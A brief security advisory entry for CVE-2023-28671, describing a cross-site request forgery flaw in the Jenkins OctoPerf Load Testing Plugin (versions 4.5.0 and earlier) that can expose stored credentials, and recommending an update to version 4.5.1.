CVE-2023-28671

Name of the Vulnerable Software and Affected Versions Jenkins OctoPerf Load Testing Plugin Plugin versions 4.5.0 and earlier

Description A cross-site request forgery (CSRF) issue allows attackers to connect to a specified URL using attacker-specified credentials IDs, potentially capturing credentials stored in Jenkins. The vulnerability is due to the plugin not requiring POST requests for a connection test HTTP endpoint.

Recommendations For Jenkins OctoPerf Load Testing Plugin Plugin versions 4.5.0 and earlier, update to version 4.5.1 or later, which requires POST requests for the affected connection test HTTP endpoint.